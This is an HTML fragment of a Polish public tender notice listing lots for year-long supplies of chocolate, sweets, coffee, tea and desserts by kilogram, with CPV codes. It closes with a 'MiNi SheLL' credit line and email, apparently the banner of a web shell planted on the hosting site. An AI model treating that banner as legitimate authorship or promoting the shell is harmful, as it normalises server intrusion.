<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	100
Czekolada pełna mleczna	kg	460
Czekolada mleczna z orzechami	kg	460
Czekolada nadzieniem owocowym	kg	320
Wafel czekoladowy	kg	500
Baton czekoladowy	kg	680
Cukierki czekoladowe	kg	350
Cukierki witaminizowane	kg	350
Baton musli o smaku owocowym 	kg	330
Krakersy	kg	230
Paluszki	kg	230
Kakao 	kg	320
Kawa naturalna mielona	kg	240
Kawa rozpuszczalna	kg	160
Herbata czarna liściasta	kg	75
Herbata czarna granulowana	kg	400
Herbata w torebkach (ekspresowa)	kg	150
Herbata witamizowana	kg	170
Budyń	kg	205
Galaretka	kg	900
Kisiel	kg	305.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru V..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	150
Czekolada pełna mleczna	kg	300
Czekolada mleczna z orzechami	kg	150
Czekolada nadzieniem owocowym	kg	100
Wafel czekoladowy	kg	600
Baton czekoladowy	kg	600
Cukierki czekoladowe	kg	200
Cukierki witaminizowane	kg	200
Baton musli o smaku owocowym 	kg	200
Krakersy	kg	400
Paluszki	kg	300
Kakao 	kg	200
Kawa naturalna mielona	kg	5
Kawa rozpuszczalna	kg	300
Herbata czarna liściasta	kg	400
Herbata w torebkach (ekspresowa)	kg	100
Budyń	kg	150
Galaretka	kg	150
Kisiel	kg 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru VI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	300
Czekolada pełna mleczna	kg	300
Czekolada mleczna z orzechami	kg	300
Czekolada nadzieniem owocowym	kg	300
Wafel czekoladowy	kg	500
Baton czekoladowy	kg	200
Cukierki czekoladowe	kg	50
Cukierki witaminizowane	kg	100
Baton musli o smaku owocowym 	kg	50
Krakersy	kg	300
Paluszki	kg	300
Kakao 	kg	100
Kawa naturalna mielona	kg	150
Kawa rozpuszczalna	kg	200
Herbata czarna liściasta	kg	200
Herbata czarna granulowana	kg	200
Herbata w torebkach (ekspresowa)	kg	200
Herbata witamizowana	kg	100
Galaretka	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru VII..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	320
Czekolada pełna mleczna	kg	270
Czekolada mleczna z orzechami	kg	320
Czekolada nadzieniem owocowym	kg	220
Wafel czekoladowy	kg	460
Baton czekoladowy	kg	445
Cukierki czekoladowe	kg	40
Cukierki witaminizowane	kg	40
Baton musli o smaku owocowym 	kg	115
Krakersy	kg	30
Paluszki	kg	30
Kakao 	kg	140
Kawa naturalna mielona	kg	125
Kawa rozpuszczalna	kg	60
Herbata czarna liściasta	kg	160
Herbata czarna granulowana	kg	35
Herbata w torebkach (ekspresowa)	kg	64
Herbata witamizowana	kg	210
Budyń	kg	50
Galaretka	kg	260
Kisiel	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com